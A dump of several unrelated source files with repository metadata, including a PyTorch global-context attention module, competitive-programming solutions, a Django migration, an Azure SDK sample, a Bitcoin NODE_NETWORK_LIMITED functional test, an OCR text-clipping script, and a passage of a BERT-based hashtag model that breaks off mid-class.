import torch.nn.functional as F
from .create_act import create_act_layer, get_act_layer
from .helpers import make_divisible
from .mlp import ConvMlp
from .norm import LayerNorm2d
class GlobalContext(nn.Module):
def __init__(self, channels, use_attn=True, fuse_add=False, fuse_scale=True, init_last_zero=False,
rd_ratio=1./8, rd_channels=None, rd_divisor=1, act_layer=nn.ReLU, gate_layer='sigmoid'):
super(GlobalContext, self).__init__()
act_layer = get_act_layer(act_layer)
self.conv_attn = nn.Conv2d(channels, 1, kernel_size=1, bias=True) if use_attn else None
if rd_channels is None:
rd_channels = make_divisible(channels * rd_ratio, rd_divisor, round_limit=0.)
if fuse_add:
self.mlp_add = ConvMlp(channels, rd_channels, act_layer=act_layer, norm_layer=LayerNorm2d)
else:
self.mlp_add = None
if fuse_scale:
self.mlp_scale = ConvMlp(channels, rd_channels, act_layer=act_layer, norm_layer=LayerNorm2d)
else:
self.mlp_scale = None
self.gate = create_act_layer(gate_layer)
self.init_last_zero = init_last_zero
self.reset_parameters()
def reset_parameters(self):
if self.conv_attn is not None:
nn.init.kaiming_normal_(self.conv_attn.weight, mode='fan_in', nonlinearity='relu')
if self.mlp_add is not None:
nn.init.zeros_(self.mlp_add.fc2.weight)
def forward(self, x):
B, C, H, W = x.shape
if self.conv_attn is not None:
attn = self.conv_attn(x).reshape(B, 1, H * W) # (B, 1, H * W)
attn = F.softmax(attn, dim=-1).unsqueeze(3) # (B, 1, H * W, 1)
context = x.reshape(B, C, H * W).unsqueeze(1) @ attn
context = context.view(B, C, 1, 1)
else:
context = x.mean(dim=(2, 3), keepdim=True)
if self.mlp_scale is not None:
mlp_x = self.mlp_scale(context)
x = x * self.gate(mlp_x)
if self.mlp_add is not None:
mlp_x = self.mlp_add(context)
x = x + mlp_x
return x
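
# Minimal usage sketch (channel count and shapes are illustrative, not from this repo):
#   gc = GlobalContext(channels=64)
#   y = gc(torch.randn(2, 64, 32, 32))  # context-refined output, same (B, C, H, W) shape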
| [
"[email protected]"
] | |
162e921c3a9621f4f8e877078a58211b9278b0a5 | f6bba50fccc6fb0dae2f046193434cfb4b9d32d5 | /121/A.py | 9289baf98b8a4ddbe3c1fee1117da72c3e424709 | [] | no_license | seven320/AtCoder | 4c26723d20004fe46ce118b882faabc05066841c | 45e301e330e817f1ace4be4088d3babe18588170 | refs/heads/master | 2021-11-22T22:57:32.290504 | 2021-10-24T09:15:12 | 2021-10-24T09:15:12 | 162,827,473 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | # encoding:utf-8
H,W = map(int,input().split())
h,w = map(int,input().split())
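# Inclusion-exclusion on the painted cross: H*W - (h*W + H*w) + h*w = (H-h)*(W-w).
# e.g. H=W=5, h=w=2: 25 - (10 + 10) + 4 = 9 = 3*3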
ans = H*W
ans -= (h*W+H*w)
ans += h*w
print(ans)
| [
"[email protected]"
] | |
d39063fe831b550fc02fc674df6797f6774dc2af | 2b4af8810511b5f1ed47fdf5662753b9b4af76b8 | /custom/enikshay/private_sector_datamigration/migrations/0003_auto_20170513_1805.py | fbfb08937806346ac17af7cf5bbc2706612319a5 | [] | no_license | DeckOfPandas/commcare-wddcp | 55bde89197ec5bc4a4b53d327ec6a811aec0d752 | 810d2e09d3890e3d0d70178745da5924c1db767b | refs/heads/dimagi | 2020-12-02T19:19:53.992796 | 2017-06-30T15:18:16 | 2017-07-05T12:23:26 | 96,325,707 | 1 | 0 | null | 2017-07-05T14:02:49 | 2017-07-05T14:02:49 | null | UTF-8 | Python | false | false | 477 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-13 18:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('private_sector_datamigration', '0002_auto_20170512_1919'),
]
operations = [
migrations.AlterField(
model_name='adherence',
name='episodeId',
field=models.CharField(max_length=8),
),
]
| [
"[email protected]"
] | |
a8900822d7304576a7b117aea8738776f84b8cfc | ae7c6bf729fc4527cfbb7b29bd4dee77b01584c4 | /chicago/zip_codes.py | 13725efc7dab3c1d18c9c420fa3d06d984a02a04 | [] | no_license | ghing/python-chicago | 61fd2639160bf1092d7bcfbc1101dc8428764042 | 4fefb221bca83d55e6c6eb7bae4b90149acf7c57 | refs/heads/master | 2021-01-13T04:33:02.289631 | 2017-01-20T22:13:53 | 2017-01-20T22:13:53 | 79,591,829 | 0 | 0 | null | 2017-01-20T19:44:17 | 2017-01-20T19:44:17 | null | UTF-8 | Python | false | false | 998 | py | import os.path
import six
from .base import Model, Collection, DATA_DIRECTORY
ZIP_CODE_GEOJSON_PATH = os.path.join(DATA_DIRECTORY, 'chicago_zip_codes.geojson')
class ZipCode(Model):
fields = [
'zip',
]
def __str__(self):
return self.zip
def __repr__(self):
return "ZipCode(zip='{z.zip}')".format(z=self)
class ZipCodeCollection(Collection):
model = ZipCode
def __init__(self):
self._by_zip = {}
super(ZipCodeCollection, self).__init__()
def add_item(self, item):
super(ZipCodeCollection, self).add_item(item)
self._by_zip[item.zip] = item
def get_by_zip(self, zip_code):
return self._by_zip[six.text_type(zip_code)]
def default_sort(self):
self._items = sorted(self._items, key=lambda p: p.zip)
return self
def is_chicago(self, zip_code):
return six.text_type(zip_code) in self._by_zip
ZIP_CODES = ZipCodeCollection().from_geojson(ZIP_CODE_GEOJSON_PATH)
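
# Usage sketch (the zip value below is illustrative):
#   ZIP_CODES.is_chicago(60601)      # True if that zip is in the GeoJSON
#   ZIP_CODES.get_by_zip("60601")    # -> ZipCode(zip='60601')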
| [
"[email protected]"
] | |
3192468b3d6d4a4e049545f1a74508b86d451062 | aa0270b351402e421631ebc8b51e528448302fab | /sdk/paloaltonetworks/azure-mgmt-paloaltonetworksngfw/generated_samples/fqdn_list_local_rulestack_create_or_update_maximum_set_gen.py | 755d0412200bb3a98af329c57e98ac8474ced4c4 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 2,048 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.paloaltonetworks import PaloAltoNetworksNgfwMgmtClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-paloaltonetworks
# USAGE
python fqdn_list_local_rulestack_create_or_update_maximum_set_gen.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = PaloAltoNetworksNgfwMgmtClient(
credential=DefaultAzureCredential(),
subscription_id="2bf4a339-294d-4c25-b0b2-ef649e9f5c27",
)
response = client.fqdn_list_local_rulestack.begin_create_or_update(
resource_group_name="rgopenapi",
local_rulestack_name="lrs1",
name="armid1",
resource={
"properties": {
"auditComment": "string",
"description": "string",
"etag": "aaaaaaaaaaaaaaaaaa",
"fqdnList": ["string1", "string2"],
"provisioningState": "Accepted",
}
},
).result()
print(response)
# x-ms-original-file: specification/paloaltonetworks/resource-manager/PaloAltoNetworks.Cloudngfw/preview/2022-08-29-preview/examples/FqdnListLocalRulestack_CreateOrUpdate_MaximumSet_Gen.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
ffc913ac274984b687fba1e23716572ced7bbd7b | fc861233f2ae31f3cdf312e5ca8d68029e811f69 | /arrays/SuperWashingMachine_HARD.py | d07ff21678abb6b5f9300ede6cf7a6089d3f2b78 | [] | no_license | QuentinDuval/PythonExperiments | 20fc54d98ff6e4131975809c32cf8844ff2a8ecb | 3ffcfee5cedf421d5de6d0dec4ba53b0eecbbff8 | refs/heads/master | 2021-07-26T21:24:18.324350 | 2020-05-02T08:11:58 | 2020-05-02T08:11:58 | 163,210,028 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | """
https://leetcode.com/problems/super-washing-machines/
You have n super washing machines on a line. Initially, each washing machine has some dresses or is empty.
For each move, you could choose any m (1 ≤ m ≤ n) washing machines, and pass one dress of each washing machine
to one of its adjacent washing machines at the same time .
Given an integer array representing the number of dresses in each washing machine from left to right on the line,
you should find the minimum number of moves to make all the washing machines have the same number of dresses.
If it is not possible to do it, return -1.
"""
from typing import List
class Solution:
def findMinMoves(self, machines: List[int]) -> int:
"""
Do not care about individual transfers:
* [1, 0, 5] requires 3 moves for 5 to go down to 2 (only thing to care about)
* [0,3,0] requires 2 moves for 3 to go down to 1 (only thing to care about)
* [1,2,2,2,3] requires 1 move (since all can move in same direction)
        But there are some subtleties:
* [3,3,0,0,0,0] => 4 because the second number 3 will not be able to decrease at first
        * [0,3,3,0,0,0] => 3 because there are two sides for leaking (so the surplus of 4 will take 3 turns)
* [0,3,0] => 2 because there are two sides, but just 1 element (max capacity of leaking)
* [0,0,3,3,3,0,0,0,0] => 4 because of two sides
Idea is to do a cumulative sum to check how much needs to flow:
[100, 98, 104, 97, 105, 98, 106, 87 , 105, 98, 105, 97, 98, 101, 101]
[0, -2, 4, -3, 5, -2, 6, -13, 5, -2, 5, -3, -2, 1, 1]
[0, -2, 2, -1, 4, 2, 8, -5, 0, -2, 3, 0, -2, -1, 0] cum_sum_left (V)
[0, 0, 2, -2, 1, -4, -2, -8, 5, 0, 2, -3, 0, 2, 1] cum_sum_right (X)
But you should also take into account the maximum value of each node:
[0 ,3, 0] should be 2 cause you need 2 turns to empty one
[-1,2,-1]
[-1,1, 0]
"""
# Create an example
'''
import numpy as np
ex = [100] * 100
for _ in range(500):
i, j = np.random.randint(0,len(ex),size=2)
ex[i] -= 1
ex[j] += 1
print(ex)
'''
# Quick check
total = sum(machines)
N = len(machines)
middle = total // N
if middle * N != total:
return -1
# Maximum contiguous sub-array sum
max_surplus = max(max(m - middle, 0) for m in machines)
cum_surplus = 0
for hi in range(len(machines)):
cum_surplus += (machines[hi] - middle)
max_surplus = max(max_surplus, abs(cum_surplus))
return max_surplus
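
# Quick checks against the docstring examples (illustrative, not part of the original file):
#   Solution().findMinMoves([1, 0, 5])  # -> 3
#   Solution().findMinMoves([0, 3, 0])  # -> 2
#   Solution().findMinMoves([1, 2])     # -> -1 (total is not divisible by n)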
| [
"[email protected]"
] | |
ffcaeac98202cabcc7de9239e976408589ad2a24 | b7bf93fc21ba8eec04d6f24e79689dd7bb989770 | /test/functional/p2p_node_network_limited.py | 84d7213b4cad926cabd2f4fcbe678d02664e31d6 | [
"MIT"
] | permissive | onuratakan/bitracoin | cd3ab809af1ce9e245b2fecf59e1421e1e427f90 | 1d73e0b6352d29066706ac4033dc7b4711246883 | refs/heads/main | 2023-04-09T03:10:58.075426 | 2021-04-16T22:06:06 | 2021-04-16T22:06:06 | 358,728,118 | 0 | 0 | MIT | 2021-04-16T22:06:07 | 2021-04-16T21:54:02 | null | UTF-8 | Python | false | false | 5,030 | py | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, msg_getdata, msg_verack, NODE_BLOOM, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, disconnect_nodes, connect_nodes_bi, sync_blocks, wait_until
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-prune=550', '-addrmantest'], [], []]
def disconnect_all(self):
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[1], 0)
disconnect_nodes(self.nodes[2], 1)
disconnect_nodes(self.nodes[2], 0)
disconnect_nodes(self.nodes[0], 2)
disconnect_nodes(self.nodes[1], 2)
def setup_network(self):
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
expected_services = NODE_BLOOM | NODE_WITNESS | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
connect_nodes_bi(self.nodes, 0, 1)
blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrieve block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
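        # 1036 == NODE_BLOOM (4) | NODE_WITNESS (8) | NODE_NETWORK_LIMITED (1024)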
assert_equal(node1.firstAddrnServices, 1036)
self.nodes[0].disconnect_p2ps()
node1.wait_for_disconnect()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
connect_nodes_bi(self.nodes, 0, 2)
try:
sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
connect_nodes_bi(self.nodes, 1, 2)
# sync must be possible
sync_blocks(self.nodes)
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)
        # connect node1 (non pruned) with node0 (pruned) and check if they can sync
connect_nodes_bi(self.nodes, 0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
| [
"[email protected]"
] | |
84f0f8092f81b651d958dbf77cda36576cc605bd | 605c10db2f950a506af60d57a2074f97ebcf89ab | /code/PROJECT/data_collection/tools/tool_clip_text.py | 8e05a495532ed234d8027f39ebae50d4b03c5f0e | [] | no_license | MulongXie/Research-ReverselyGeneratingWebCode | 928f90d6b4f80ebff40a9a3a48f8b564277a0987 | 2c1598a765166f30786b0e6a22c485358ca2e98d | refs/heads/master | 2020-05-17T18:14:02.241209 | 2020-04-10T00:19:16 | 2020-04-10T00:19:16 | 183,857,077 | 0 | 3 | null | 2020-02-03T04:31:34 | 2019-04-28T04:51:24 | Python | UTF-8 | Python | false | false | 2,437 | py | import pytesseract as pyt
import cv2
import numpy as np
import glob
from os.path import join as pjoin
ROOT_CLEAN_IMG = 'E:\Mulong\Datasets\dataset_webpage\page10000\ip_img_clean'
ROOT_OUTPUT = "E:/Mulong/Datasets/dataset_webpage/elements/text"
def clipping(img, corners, output_root=ROOT_OUTPUT, pad=False, show_clip=False, write_clip=True):
def padding():
height = np.shape(clip)[0]
width = np.shape(clip)[1]
pad_height = int(height / 10)
pad_wid = int(width / 10)
pad_img = np.full(((height + pad_height), (width + pad_wid), 3), 255, dtype=np.uint8)
pad_img[int(pad_height / 2):(int(pad_height / 2) + height), int(pad_wid / 2):(int(pad_wid / 2) + width)] = clip
return pad_img
for i, corner in enumerate(corners):
(top_left, bottom_right) = corner
(col_min, row_min) = top_left
(col_max, row_max) = bottom_right
clip = img[row_min:row_max, col_min:col_max]
if pad:
clip = padding()
if write_clip:
cv2.imwrite(pjoin(output_root, str(i) + '.png'), clip)
if show_clip:
cv2.imshow('clip', clip)
cv2.waitKey(0)
def text_detection(img_clean, show=False):
try:
data = pyt.image_to_data(img_clean).split('\n')
broad = img_clean.copy()
except:
return None
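    # image_to_data() rows are TSV ending in: left, top, width, height, conf, text.
    # After a whitespace split, d[-6..-3] hold the word box and d[-1] the word text;
    # rows with no recognized word collapse, leaving the '-1' confidence in d[-1].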
corners_word = []
for d in data[1:]:
d = d.split()
if d[-1] != '-1':
if d[-1] != '-' and d[-1] != '—' and 5 < int(d[-3]) < 40 and 5 < int(d[-4]) < 100:
t_l = (int(d[-6]), int(d[-5]))
b_r = (int(d[-6]) + int(d[-4]), int(d[-5]) + int(d[-3]))
corners_word.append((t_l, b_r))
cv2.rectangle(broad, t_l, b_r, (0, 0, 255), 1)
if show:
cv2.imshow('a', broad)
cv2.waitKey()
return corners_word
def read_img():
img_paths = glob.glob(pjoin(ROOT_CLEAN_IMG, '*.png'))
img_paths.sort(key=lambda x: int(x.split('\\')[-1][:-4]))
start_index = 5647
end_index = 20000
for img_path in img_paths:
index = img_path.split('\\')[-1][:-4]
if int(index) < start_index:
continue
if int(index) > end_index:
break
print(img_path)
img = cv2.imread(img_path)
corners_word = text_detection(img)
if corners_word is not None:
clipping(img, corners_word)
read_img()
| [
"[email protected]"
] | |
bbf636e5ca3a130e3de7564001791c09bed132d0 | d3a204a438d7f2d439b3f18be9cf1271f5ab475f | /project3/my_model_using_bert23.py | dd43fed3a6bf8f332956534b15c48b9f1a5062f3 | [] | no_license | saga9017/laboratory | f2f0d07fb691bd89e6f614cca7e377e82da5f656 | 77c53c36a99c0da17f23df235edacbcf83469b42 | refs/heads/master | 2021-05-16T19:32:23.477377 | 2020-03-27T06:44:16 | 2020-03-27T06:44:16 | 250,438,442 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,191 | py | """""""""""""""""""""""""""
using pre-trained bert, using cls for prediction, fine-tuning, using text + location + knowledge
"""""""""""""""""""""""""""
import sys, os
from datetime import datetime
import numpy as np
import random
import copy
import time
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.parameter import Parameter
import math
from transformers import *
from project3_data.result_calculator import *
import torch.nn.utils as torch_utils
os.environ["CUDA_VISIBLE_DEVICES"] = '1'
print('gpu :', torch.cuda.is_available())
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
import pickle
import tensorflow as tf
from project3_data.config import *
Dropout = 0.1
hidden_dim = 768
MAX_LENGTH = 450
# ★ oversampling
# def train_generate_batch(t_maxlen, l_maxlen, hashtag_size, hashtagCount, hashtagCount_saved, tag_used):
# batch_img = np.zeros((batch_size(), 1, feat_dim(), w(), w()))
# batch_text = np.zeros((batch_size(), t_maxlen))
# batch_loc = np.zeros((batch_size(), l_maxlen))
# batch_y = np.zeros(batch_size())
# truth_hashtag = []
# text_start = []
# epoch_finish = False
# for i in range(batch_size()):
#
# hashtag_choice = random.randrange(0, hashtag_size)
# data_choice = random.randrange(0, len(hashtagCount[hashtag_choice]))
# # print(hashtag_choice, data_choice, "/", len(hashtagCount[hashtag_choice]))
# # while True:
# # hashtag_choice = random.randrange(0, hashtag_size)
# # if tag_used[hashtag_choice] == False:
# # data_choice = random.randrange(0, len(hashtagCount[hashtag_choice]))
# # break
#
# data_index = hashtagCount[hashtag_choice][data_choice]
# batch_img[i] = train_data[0][data_index]
# batch_text[i] = train_data[1][data_index]
# batch_loc[i] = train_data[2][data_index]
# batch_y[i] = hashtag_choice
# truth_hashtag.append(train_data[3][data_index])
#
# allzero = False
# for q, j in enumerate(batch_text[i]):
# if int(j) != 0:
# text_start.append(q)
# allzero = True
# break
# if allzero == False: text_start.append(0)
#
# del hashtagCount[hashtag_choice][data_choice]
# if len(hashtagCount[hashtag_choice]) == 0:
# tag_used[hashtag_choice] = True
# hashtagCount[hashtag_choice] = copy.deepcopy(hashtagCount_saved[hashtag_choice])
# if np.all(tag_used) == True:
# print("다썼다!")
# tag_used = [False for g in range(hashtag_size)]
# epoch_finish = True
# break
#
# return batch_img, batch_text, batch_loc, batch_y, epoch_finish, truth_hashtag, text_start, tag_used, hashtagCount
# ★ shuffle batch
# def generate_batch(which, pnt, y_cnt, t_maxlen, l_maxlen, finish):
# batch_img = np.zeros((batch_size(), 1, feat_dim(), w(), w()))
# batch_text = np.zeros((batch_size(), t_maxlen))
# batch_loc = np.zeros((batch_size(), l_maxlen))
# batch_y = np.zeros(batch_size())
# batch_cnt = 0
# truth_hashtag = []
# shuffle = list(range(batch_size()))
# random.shuffle(shuffle)
# while True:
# text_start = []
# if which == "train":
# hashend = len(train_data[3][pnt])
# datalen = len(train_data[0])
# batch_img[shuffle[batch_cnt]] = train_data[0][pnt]
# batch_text[shuffle[batch_cnt]] = train_data[1][pnt]
# batch_loc[shuffle[batch_cnt]] = train_data[2][pnt]
# batch_y[shuffle[batch_cnt]] = train_data[3][pnt][y_cnt]
# truth_hashtag.append(train_data[3][pnt])
# elif which == "validation":
# hashend = len(val_data[3][pnt])
# datalen = len(val_data[0])
# batch_img[shuffle[batch_cnt]] = val_data[0][pnt]
# batch_text[shuffle[batch_cnt]] = val_data[1][pnt]
# batch_loc[shuffle[batch_cnt]] = val_data[2][pnt]
# batch_y[shuffle[batch_cnt]] = val_data[3][pnt][y_cnt]
# truth_hashtag.append(val_data[3][pnt])
# else:
# hashend = len(test_data[3][pnt])
# datalen = len(test_data[0])
# batch_img[shuffle[batch_cnt]] = test_data[0][pnt]
# batch_text[shuffle[batch_cnt]] = test_data[1][pnt]
# batch_loc[shuffle[batch_cnt]] = test_data[2][pnt]
# batch_y[shuffle[batch_cnt]] = test_data[3][pnt][y_cnt]
# truth_hashtag.append(test_data[3][pnt])
#
# allzero = False
# for i, j in enumerate(batch_text[shuffle[batch_cnt]]):
# if int(j) != 0:
# text_start.append(i)
# allzero = True
# break
# if allzero == False: text_start.append(0)
#
# # print("------------------------------------------")
# # print("input text:")
# # for i in batch_text[batch_cnt]:
# # textnum = int(i)
# # if textnum != 0:
# # print(vocabulary_inv[textnum], end=" ")
# # print("\ninput loc:")
# # for i in batch_loc[batch_cnt]:
# # locnum = int(i)
# # if locnum != 0:
# # print(vocabulary_inv[locnum], end=" ")
# # print("\nTrue hashtag:")
# # for i in truth_hashtag[batch_cnt]:
# # print(hashtagVoc_inv[int(i)], end="||")
# # print()
# y_cnt += 1
# batch_cnt += 1
#
# if y_cnt == hashend:
# y_cnt = 0
# pnt += 1
# if pnt == datalen:
# pnt = 0
# finish = True
#
# if finish or batch_cnt == batch_size(): break
# return batch_img, batch_text, batch_loc, batch_y, pnt, y_cnt, finish, truth_hashtag, text_start
def load_k():
k_train, k_val, k_test = [], [], []
with open("project3_data/txt/e5_train_insta_textonly.txt", "r") as f:
while True:
line = f.readline()
if not line: break
line = line.split()
for i in range(len(line)):
line[i] = int(line[i])
k_train.append(line)
with open("project3_data/txt/e5_val_insta_textonly.txt", "r") as f:
while True:
line = f.readline()
if not line: break
line = line.split()
for i in range(len(line)):
line[i] = int(line[i])
k_val.append(line)
with open("project3_data/txt/e5_test_insta_textonly.txt", "r") as f:
while True:
line = f.readline()
if not line: break
line = line.split()
for i in range(len(line)):
line[i] = int(line[i])
k_test.append(line)
return k_train, k_val, k_test
"""""
def generate_batch(which, pnt, y_cnt, t_maxlen, l_maxlen, finish):
batch_img = np.zeros((batch_size(), 1, feat_dim(), w(), w()))
batch_text = np.zeros((batch_size(), t_maxlen))
batch_loc = np.zeros((batch_size(), l_maxlen))
batch_know = np.zeros((batch_size(), cat_num()))
batch_y = np.zeros(batch_size())
batch_cnt = 0
truth_hashtag = []
while True:
if which == "train":
hashend = len(train_data[3][pnt])
datalen = len(train_data[0])
batch_img[batch_cnt] = train_data[0][pnt]
batch_text[batch_cnt] = train_data[1][pnt]
batch_loc[batch_cnt] = train_data[2][pnt]
batch_y[batch_cnt] = train_data[3][pnt][y_cnt]
truth_hashtag.append(train_data[3][pnt])
batch_know[batch_cnt] = train_data[4][pnt]
elif which == "validation":
hashend = len(val_data[3][pnt])
datalen = len(val_data[0])
batch_img[batch_cnt] = val_data[0][pnt]
batch_text[batch_cnt] = val_data[1][pnt]
batch_loc[batch_cnt] = val_data[2][pnt]
batch_y[batch_cnt] = val_data[3][pnt][y_cnt]
truth_hashtag.append(val_data[3][pnt])
batch_know[batch_cnt] = val_data[4][pnt]
else:
hashend = len(test_data[3][pnt])
datalen = len(test_data[0])
batch_img[batch_cnt] = test_data[0][pnt]
batch_text[batch_cnt] = test_data[1][pnt]
batch_loc[batch_cnt] = test_data[2][pnt]
batch_y[batch_cnt] = test_data[3][pnt][y_cnt]
truth_hashtag.append(test_data[3][pnt])
batch_know[batch_cnt] = test_data[4][pnt]
y_cnt += 1
batch_cnt += 1
if y_cnt == hashend:
y_cnt = 0
pnt += 1
if pnt == datalen:
pnt = 0
finish = True
if finish or batch_cnt == batch_size(): break
return batch_img, batch_text, batch_loc, batch_know, batch_y, pnt, y_cnt, finish, truth_hashtag
"""""
class Norm(nn.Module):
def __init__(self):
super(Norm, self).__init__()
self.gamma=Parameter(torch.tensor(1.0))
self.beta = Parameter(torch.tensor(0.0))
def forward(self, X):
mu = torch.mean(X, dim=2)
var = torch.var(X, dim=2)
X_norm = torch.div(X - mu.view(X.shape[0], X.shape[1], 1), torch.sqrt(var.view(X.shape[0], X.shape[1], 1) + 1e-8))
out = self.gamma * X_norm + self.beta
return out
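
# Note: Norm is a LayerNorm variant with a single scalar gamma/beta pair shared
# across the hidden dimension (rather than per-feature affine parameters).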
class Multi_head_attention(nn.Module):
def __init__(self, hidden_dim=300, hidden_dim_=512, dropout=Dropout):
super().__init__()
self.dropout=nn.Dropout(dropout)
self.softmax = nn.Softmax(-1)
self.layerNorm_add_Norm = Norm()
self.w_qs = nn.Linear(hidden_dim, hidden_dim_)
self.w_ks = nn.Linear(hidden_dim, hidden_dim_)
self.w_vs = nn.Linear(hidden_dim, hidden_dim_)
self.w_os = nn.Linear(hidden_dim_, hidden_dim)
nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (hidden_dim)))
nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (hidden_dim)))
nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (hidden_dim)))
nn.init.xavier_normal_(self.w_os.weight)
def forward(self, en, de, mask, dropout=False): # x : (input_len, hidden_dim)
d_k = de.shape[-1]
len_d0, len_d1=de.shape[0], de.shape[1]
len_e0, len_e1=en.shape[0], en.shape[1]
q = self.w_qs(de).view(len_d0, len_d1, -1, 8).permute(3, 0, 1, 2)
k = self.w_ks(en).view(len_e0, len_e1, -1, 8).permute(3, 0, 2, 1)
v = self.w_vs(en).view(len_e0, len_e1, -1, 8).permute(3, 0, 1, 2)
e = torch.matmul(q, k) / math.sqrt(d_k)
masked_e = e.masked_fill(mask, -1e10)
alpha = self.softmax(masked_e) # (output_len, input_len)
if dropout==True:
alpha = self.dropout(alpha)
head3 = torch.matmul(alpha, v)
a = torch.cat((head3[0], head3[1], head3[2], head3[3], head3[4],
head3[5], head3[6], head3[7]), 2)
result = self.w_os(a)
result=self.layerNorm_add_Norm(result+de)
return result # (output_len, hidden)
def gelu(x):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
x: float Tensor to perform activation.
Returns:
`x` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + torch.tanh(
(np.sqrt(2 / np.pi) * (x + 0.044715 * torch.pow(x, 3)))))
return x * cdf
class FFN(nn.Module): # feed forward network x : (batch_size, input_len, hidden)
def __init__(self, hidden_dim=300, dropout=Dropout):
super().__init__()
self.dropout = nn.Dropout(dropout)
self.layerNorm_add_Norm = Norm()
self.fc1 = nn.Linear(hidden_dim, 4 * hidden_dim)
self.fc2 = nn.Linear(4*hidden_dim, hidden_dim)
nn.init.xavier_normal_(self.fc1.weight)
nn.init.xavier_normal_(self.fc2.weight)
def forward(self, x, dropout=False):
output = self.fc1(x) # (batch_size, input_len, 4*hidden)
if dropout==True:
output = self.dropout(gelu(output)) # (batch_size, input_len, 4*hidden)
else:
output = gelu(output)
output = self.fc2(output) # (batch_size, input_len, hidden
output=self.layerNorm_add_Norm(output+x)
return output
##################################################### Sub layer ########################################################
class Encoder_layer(nn.Module):
def __init__(self, hidden_dim=300, hidden_dim_=512, dropout=Dropout): # default=512
# Assign instance variables
super().__init__()
self.multi_head_self_attention=Multi_head_attention(hidden_dim, hidden_dim_, dropout)
self.ffn=FFN(hidden_dim, dropout)
